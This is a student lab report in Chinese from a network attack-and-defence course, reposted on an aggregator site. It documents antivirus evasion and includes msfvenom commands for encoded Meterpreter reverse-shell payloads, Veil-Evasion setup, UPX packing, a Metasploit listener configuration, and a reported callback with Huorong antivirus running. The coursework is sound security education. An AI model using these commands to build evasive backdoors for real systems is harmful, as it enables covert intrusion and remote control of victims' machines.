20222311 2024-2025-1 《网络与系统攻防技术》实验三实验报告

news/2025/1/16 19:01:37/文章来源:https://www.cnblogs.com/20222311wsh/p/18517367

1.实践内容
(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

  • 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
  • veil,加壳工具
  • 使用C + shellcode编程

(2)通过组合应用各种技术实现恶意代码免杀

如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。

(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

2.实验要求

  • 掌握免杀原理与技术
  • 回答问题

(1)杀软是如何检测出恶意代码的?

  • 特征码检测:杀毒软件拥有一个特征库,通过比对程序代码是否与库中的特征码匹配来判断某段代码是否属于病毒。这种方法非常精确,但扫描效率较低,且难以应对病毒变种
  • 启发式恶意软件检测:如果程序的特征和行为与病毒程序类似,且匹配程度达到一定值,就可以认为该程序是病毒程序。这种方法不完全依赖于已知病毒的特征库,而是尝试识别新的或变种的恶意软件
  • 基于行为检测:通过监视恶意代码运行过程,如利用系统监视工具观察恶意代码运行时系统环境的变化,或通过跟踪恶意代码执行过程使用的系统函数和指令特征分析恶意代码功能。如果出现恶意行为,则属于恶意代码
  • 动态分析:利用虚拟机或沙箱执行待测程序,监控并收集程序运行时显现的行为特征,并根据这些较为高级的特征数据实现恶意代码的分类。行为特征主要包括文件操作、注册表操作、动态链接库加载、进程访问、系统服务行为、网络访问请求和API调用等
  • 签名检测:这是最传统的方法,依赖于一个不断更新的恶意软件签名数据库。杀软通过比对文件的特征码(签名)与已知恶意软件的特征码进行匹配来检测恶意代码
  • 行为分析:杀软监控程序的行为,包括对文件、网络、系统资源的访问和修改。如果软件的行为模式与已知的恶意行为模式匹配,则可能被判定为恶意软件
  • 沙箱执行:在一个隔离的环境(沙箱)中执行程序,分析其行为,从而不对实际系统造成影响。如果程序在沙箱中表现出恶意行为,那么它就可能被识别为恶意软件
  • 云检测:借助云计算技术,杀软可以迅速分析大量数据,识别新出现的恶意软件。这种方法可以有效地提高检测的速度和准确性

(2)免杀是做什么?

免杀技术,即反病毒与反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的技术。它通过各种手段规避杀毒软件和安全检测系统的识别和拦截,从而在目标系统中成功执行。这种技术不仅用于恶意软件的传播,也被信息安全研究人员用来测试和提升安全防护系统的能力。

(3)免杀的基本方法有哪些?

  • 自编码免杀:通过使用不同的编码器对恶意代码进行编码,以改变其特征码,从而避免被杀毒软件识别。例如,使用msfvenom工具配合不同的编码器进行多次编码,以增加检测难度
  • 自捆绑免杀:将恶意代码与一个合法的可执行文件捆绑在一起,这样在运行时,杀毒软件可能会因为捆绑的合法文件而放过恶意代码。例如,使用msfvenom的-x参数将payload嵌入到一个自定义的可执行文件中
  • 自捆绑+编码免杀:结合自捆绑和编码技术,既改变恶意代码的外部特征,也改变其内部结构,以提高免杀效果
  • 多重编码+捆绑免杀:使用多重编码技术对payload进行编码,并通过捆绑技术将其嵌入到合法的可执行文件中,以增加混淆度和免杀效果
  • 静态免杀方法:
    MYCCL查找特征码修改:使用MYCCL工具查找恶意代码的特征码,并对其进行修改,以避免被杀毒软件识别。
    对shellcode进行加密编码:对恶意代码中的shellcode进行加密或编码,以改变其特征,避免被静态分析工具检测
  • 动态查杀(主动防御)绕过:针对杀毒软件的动态查杀技术,通过各种手段绕过其检测,例如通过模拟正常行为或使用反调试技术
  • 启发式扫描绕过:面对未知的病毒,通过改变代码结构或行为模式,以避免被启发式扫描算法识别

3.实验过程
任务一 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

  • 使用msfvenom生成jar等文件。

  • 查看 msfvenom 支持的所有输出格式:输入msfvenom --list formats;

  • 输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=8888 -f exe > 20222311wsh.exe,生成payload;

  • -p windows/meterpreter/reverse_tcp:指定了要生成的 payload 类型,是一个 Meterpreter 反向 TCP 连接;

  • LHOST=192.168.1.108设置了连接回的本地 IP 地址,即kali虚拟机的 IP 地址;

  • LPORT=8888设置了连接回的本地端口号;

  • -f exe: 这指定了输出格式为 Windows 可执行文件;

  • 查看 msfvenom 支持的所有编码方式:输入msfvenom --list encoders;

  • 使用编码器对payload进行编码,输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.1.108 LPORT=8888 -f exe > 20222311wsh-2.exe

  • -e x86/shikata_ga_nai: 这指定了要使用的编码器;

  • -b ‘\x00’: 这指定了需要避免的坏字符集;

  • LHOST、LPORT同上;

  • 多次编码:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.1.108 LPORT=8888 -f exe > 20222311wsh-3.exe;
    -i 10表示编码10次;

  • 选择一个适用于Java环境的payload来生成jar文件:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=8888 -f jar > 20222311wsh-4.jar;

  • 使用编码器对payload进行编码:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f jar > 20222311wsh-5.jar;

  • 生成一个反向 TCP 连接的 Linux elf 可执行文件:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=8888 -f elf >20222311wsh-6.elf.

  • 使用编码器对payload进行编码:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f elf > 20222311wsh-7.elf

  • 将虚拟机中的文件传到主机上
    ncat.exe -lv 8888 > "C:\Users\Petrichor\Desktop\20222311wsh.exe
    nc 192.168.1.106 8888 < 20222311wsh.exe

  • 打开VirusTotal的链接https://www.virustotal.com/gui/home/upload,放入文件,使用VirusTotal进行检测;
    20222311wsh.exe

    20222311wsh-2.exe

    20222311wsh-3.exe

    20222311wsh-4.jar

    20222311wsh-5.jar

    20222311wsh-6.elf

    20222311wsh-7.elf

  • 使用veil工具
    安装veil,需要保持虚拟机是联网状态,依次输入以下命令:
    mkdir -p ~/.cache/wine
    cd ~/.cache/wine
    wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
    wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi


    sudo apt-get install libncurses5*
    sudo apt-get install libavutil55*
    sudo apt-get install gcc-mingw-w64*
    sudo apt-get install wine32
    当输入完sudo apt-get install wine32后报错,此时先输入dpkg --add-architecture i386,再输入sudo apt-get update,然后输入sudo apt-get install wine32即可;




    再依次输入:
    apt-get install veil ——安装veil
    sudo su
    cd /usr/share/veil/config/


    再输入vim setup.sh
    在第200多行的代码中,找到下图内容,按i键进入编辑模式,把下载地址换成https://gitee.com/spears/VeilDependencies.git,按ESC键,输入:wq退出;

    运行veil进行安装;

    过程中可能需要安装多个程序,一路默认安装即可;
    完成安装

    输入use evasion ,进入Evil—Evasion;

    输入list,查看可使用的payload类型;

    使用c/meterpretermrev_tcp.py,即7号,所以输入use 7;

    先看下虚拟机ip地址

    依次输入命令
    set LHOST 192.168.1.108
    set LPORT 8888
    generate

    把生成的文件命名为V20222311
    对V20222311.exe进行检测

  • 加壳处理来试图实现免杀
    压缩加壳
    输入指令upx 20222311wsh.exe -o 20222311wsh_upx.exe,对后门文件进行压缩加壳,生成文件20222311wsh_upx.exe。


    将20222311wsh_upx.exe上传至VirusTotal检测

任务2:通过组合应用各种技术实现恶意代码免杀

kali虚拟机中通过msfvenom生成Shellcode数组,代码如下msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=8888 -f c;

将buf[]中的内容复制,新建666.cpp文件,输入代码,代码功能为将复制内容放入shellcode[]数组中,通过代码将shellcode进行凯撒加密,将密文输入到20222311.txt文件中
代码如下


运行结束后,20222311.txt内容如下

新建666.2.cpp文件,输入代码,代码功能为读取20222311.txt文件中的内容到shellcode[]数组中,并进行解密,再运行shellcode;
代码如下:

将两个exe文件放在桌面且运行发现可以与杀软共生,但是在运行时依旧会跳出提示存在安全危险是否信任,成功免杀的原因是因为使用了代码混淆和加密技术导致杀软无法识别。

杀软为火绒安全软件,版本为5.0.75.16

任务三:用电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
在kali中使用msfconsole指令进入msf控制台,对msf控制台进行配置;
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.108
set LPORT 8888
输入run;

在主机运行666.2.exe,返回到kali,输入sysinfo,查看版本

4.问题及解决方案

  • 问题1:安装veil失败
    解决方案:第一次失败是因为veil下载到一半宿舍断电了,导致虚拟机无法继续下载,只能重装虚拟机。第二次失败是因为分配的空间不够,我还是重装了虚拟机。
  • 问题2:在把下载地址换成https://gitee.com/spears/VeilDependencies.git时,我不小心多删除了一个引号,导致后续veil无法安装
    解决方案:我对照网上别人的修改截图,仔细检查发现了这个问题,修改完成后不再报错。
  • 问题3:使用hyperion加壳工具是会产生报错:ShellExecuteEx failed: File not found 或者XXX not found
    解决方案:我发现我输入这段代码时没有进入到文件所在目录,进入文件所在目录就可以正常运行。

5.心得体会

  • 在进行网络攻防技术的实验中,我深刻体会到了免杀技术的重要性和复杂性。通过实践,我学会了如何使用msf编码器、veil-evasion等工具来生成不同格式的文件,如jar文件,以及如何通过加壳技术来隐藏恶意代码的真实意图。这些工具和技巧让我能够更深入地理解恶意代码是如何逃避杀毒软件检测的。

  • 在实验过程中,我尝试了多种技术组合,包括编码、加壳、混淆等,以实现恶意代码的免杀。这些技术的原理主要是通过改变恶意代码的外观和行为,使其在杀毒软件的静态和动态分析中不被发现。例如,通过编码器对shellcode进行多次编码,可以改变其特征码,使得杀毒软件难以识别;而加壳工具则可以在不改变代码功能的前提下,对代码进行封装,增加检测难度。

  • 在实验的最后阶段,我在另一台电脑上进行了实际测试。在杀毒软件开启的情况下,我生成的恶意代码能够成功运行并回连。这验证了我的免杀技术是有效的。

  • 通过这次实验,我不仅提高了自己的技术能力,也对网络安全有了更深的认识。我意识到,随着技术的发展,攻防双方的对抗也在不断升级。作为网络空间安全专业的学生,我们需要不断学习新的技术和方法,以应对日益复杂的网络威胁。这次实验不仅让我掌握了免杀技术,也让我更加警惕网络安全的重要性。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/824566.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Linux安装Python 3.11

Linux安装python 在Linux上安装Python 3.11,你可以按照以下步骤进行。这些步骤以CentOS为例,但其他Linux发行版的过程大同小异,可能只需稍作调整。 1. 检查Python版本 首先,打开终端,检查系统上是否已安装Python 3.11: python3.11 --version # 或者 python3 --version如果…

java项目自启动方案——jar包做成服务(Windows版本)

需求:公司做的很多项目都是属于客户端—服务器形式,在客户端部分运行了属于面向用户操作的项目jar包,客户端机器就不像服务器那样,经常会遇到重启机器的情况,所以让我们的项目能自启动就是个必须的工作。方案: (1)环境:电脑需要安装Microsoft.NETFramework 4 ,如果有…

echarts 睡眠时间段+日期

效果图:关键方法代码:const initChartDataTwo = (scollectT, dataL) => {//给一个测试的数据 scollectT = [ "2024-10-29", "2024-10-25", "2024-10-24", "2024-10-22", "2024-10-18", "2024-10…

威联通NAS开机报错数据恢复

针对威联通NAS开机报错的数据恢复问题,以下是一些建议的解决步骤和恢复方法: 一、初步检查与诊断 检查硬件状态: 确保NAS设备的电源正常连接,并检查所有硬盘是否都正常工作。 如果可能,尝试重新插拔硬盘或更换故障硬盘。 2.查看错误代码和日志: 登录NAS管理界面(如果还能…

服务器漏洞修复和php一键安装包环境 nginx 安装拓展模块

服务器漏洞修复header头缺失问题https://blog.51cto.com/u_16213703/10249280add_header X-XSS-Protection 1; mode=block;add_header X-Frame-Options SAMEORIGIN;add_header X-Content-Type-Options nosniff;add_header X-Download-Options: noopen;add_header Set-Cookie &q…

为什么要有PDM数据管理系统

企业需要有PDM数据管理系统,是因为它具备如下功能:一、优化数据组织与存储;二、提升团队协作效率;三、确保数据安全与可追溯性;四、加快产品开发周期;五、支持智能决策和数据分析。优化数据组织与存储可以减少重复工作,并确保数据的一致性和可靠性。一、优化数据组织与存…

单据表头录入控件长度调整

单据表头的控件长度,如果单个控件改变长度,就会出现错位的情况,所以只有所有控件长度统一调整才行,方法如下 1、修改安装目录S3\Program目录下Web.Config中的相关配置2、记事本打开web.config找到DefaultSkin,把这个DefaultSkin改成owner 。改成: defaultSkinName="…

Vue组件化–知识补充

全局CSS和局部CSS 当我们需要CSS只在当前的.vue文件中生效可以在style后面添加scoped创建vue项目的方式 1.Vue Cli:vue create 基于--->webpack 2.npm init vue@latest 基于-->vite1.安装一个本地工具:create-vue2.使用create-vue创建一个Vue项目

jmeter压测接口报出现503解决办法

jmeter界面还有503报错2024/10/30 17:53:54 [error] 6522#0: *60199372 limiting connections by zone "perip", client: 116.25.118.145, server: rider-mall.test3.fnjkj.cn, request: "POST /rider/order/userBrowse/userOrderQuery HTTP/1.1", host: &…

快消行业 | 超高效拜访路线规划, 抓住“每一片”利润

高效拜访,关键在于科学规划。如何避免漏访、无效拜访或拜访不及时?拜访路线规划是破局之策,它直击终端拜访的核心痛点,助力实现最佳拜访效果,进而提升终端门店销售业绩。 传统拜访模式下,业务人员往往因无提前规划而效率低下,问题频发。科学的拜访路线规划,能精准缩减行…

Java爬虫:在1688上“夺宝奇兵”获取店铺详情

想象一下,你是一名勇敢的探险家,手持藏宝图,在数字世界的海洋中寻找那传说中的宝藏——1688店铺详情。 今天,我们将一起化身为代码界的“夺宝奇兵”,使用Java爬虫技术,揭开1688店铺详情的神秘面纱。准备好 你的帽子和鞭子,我们即将启程!背景介绍 你是否曾在浏览1688时,…

推荐一个 ASP.NET Core 的轻量级插件框架

前言 本文将介绍一个专为ASP.NET Core设计的轻量级插件框架——PluginCore,该框架不仅能够简化插件的开发与集成,还能大幅提高开发效率。 另外,还将简要介绍相关的前端技术和SDK支持,帮助我们快速上手。 项目介绍 PluginCore是一个轻量级插件框架,通过最小化的配置简化插件…